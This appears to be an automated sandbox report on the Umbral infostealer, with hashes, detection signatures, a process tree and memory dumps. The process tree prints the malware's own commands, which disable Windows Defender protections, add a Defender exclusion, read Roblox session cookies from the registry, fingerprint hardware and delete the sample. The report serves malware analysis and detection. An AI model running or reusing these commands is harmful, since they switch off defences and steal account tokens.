Analysis

  • max time kernel
    14s
  • max time network
    17s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    10-11-2024 16:32

General

  • Target

    Umbral.exe

  • Size

    229KB

  • MD5

    468453ade106242c46c6ebc95df5e233

  • SHA1

    901875b848f10048764fe07c0c6ac7db7c33f551

  • SHA256

    2a92c314a04c06f608c96a0736b3ea76179085295b700019c9db0de2085e9d7d

  • SHA512

    4d351c895e3456ab926ff13c03f779f4804f8011085e311dcd16825f87ec6290b37d52a555e187ab748da40998301c8258a8c2c74d74640c795574590fa374eb

  • SSDEEP

    6144:lloZM9rIkd8g+EtXHkv/iD4hEnG1DA0r2SjVg8Zk5b8e1mhxi:noZOL+EP8hEnG1DA0r2SjVg8Zw8o

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4564
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:1920
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1152
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4836
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:940
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4716
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:868
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious behavior: EnumeratesProcesses
      PID:3520
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:4500

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    60b3262c3163ee3d466199160b9ed07d

    SHA1

    994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

    SHA256

    e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

    SHA512

    081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    948B

    MD5

    b8e50b3ccd57a2aeb68434d7199c85d9

    SHA1

    92236e535a13bcfbfabcb0ec9953f1805e84fc4d

    SHA256

    ac8499b85d6a6b42251afd44955b7227b98949510d2dd6e05040bf14cbd5a66a

    SHA512

    77f7d855380ea10d20ea2da82a13a4255e7b5767ed0bbc764e2a2f80ca90fd0c4fa2a58517e4c2d281435b7728946db05a73dfa8cb1e4e420a6a9133061939e8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    8e1fdd1b66d2fee9f6a052524d4ddca5

    SHA1

    0a9d0994559d1be2eecd8b0d6960540ca627bdb6

    SHA256

    4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

    SHA512

    5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    beaa733206e6159a16f84258a3868738

    SHA1

    5d973073d1fb8bf3b4654ad9172b1519c5ee3ce7

    SHA256

    d5387e07c332114cd393c847f7e0fe5108ec208798391a756fc1298daab786dd

    SHA512

    0fa50d16101a53ff2c43c62e370462feeae1283b6c33167d1ca9e293d2373f00e16f289f07caabe5789aa633c3a622bca4d3e499fd6af38001a3dbcee454b73f

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sglmw2au.u25.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1388-48-0x000001ABF7830000-0x000001ABF7A4D000-memory.dmp

    Filesize

    2.1MB

  • memory/2084-15-0x00007FFD8F9F0000-0x00007FFD904B2000-memory.dmp

    Filesize

    10.8MB

  • memory/2084-16-0x00007FFD8F9F0000-0x00007FFD904B2000-memory.dmp

    Filesize

    10.8MB

  • memory/2084-17-0x00007FFD8F9F0000-0x00007FFD904B2000-memory.dmp

    Filesize

    10.8MB

  • memory/2084-20-0x00007FFD8F9F0000-0x00007FFD904B2000-memory.dmp

    Filesize

    10.8MB

  • memory/2084-12-0x000001C49E530000-0x000001C49E552000-memory.dmp

    Filesize

    136KB

  • memory/2084-14-0x00007FFD8F9F0000-0x00007FFD904B2000-memory.dmp

    Filesize

    10.8MB

  • memory/2084-13-0x00007FFD8F9F0000-0x00007FFD904B2000-memory.dmp

    Filesize

    10.8MB

  • memory/4564-36-0x000001BAB2290000-0x000001BAB22AE000-memory.dmp

    Filesize

    120KB

  • memory/4564-34-0x000001BAB22D0000-0x000001BAB2346000-memory.dmp

    Filesize

    472KB

  • memory/4564-35-0x000001BAB2350000-0x000001BAB23A0000-memory.dmp

    Filesize

    320KB

  • memory/4564-2-0x00007FFD8F9F0000-0x00007FFD904B2000-memory.dmp

    Filesize

    10.8MB

  • memory/4564-0-0x00007FFD8F9F3000-0x00007FFD8F9F5000-memory.dmp

    Filesize

    8KB

  • memory/4564-63-0x000001BAB22C0000-0x000001BAB22CA000-memory.dmp

    Filesize

    40KB

  • memory/4564-64-0x000001BAB24C0000-0x000001BAB24D2000-memory.dmp

    Filesize

    72KB

  • memory/4564-1-0x000001BA97B90000-0x000001BA97BD0000-memory.dmp

    Filesize

    256KB

  • memory/4564-84-0x00007FFD8F9F0000-0x00007FFD904B2000-memory.dmp

    Filesize

    10.8MB

  • memory/4836-60-0x0000026877320000-0x000002687753D000-memory.dmp

    Filesize

    2.1MB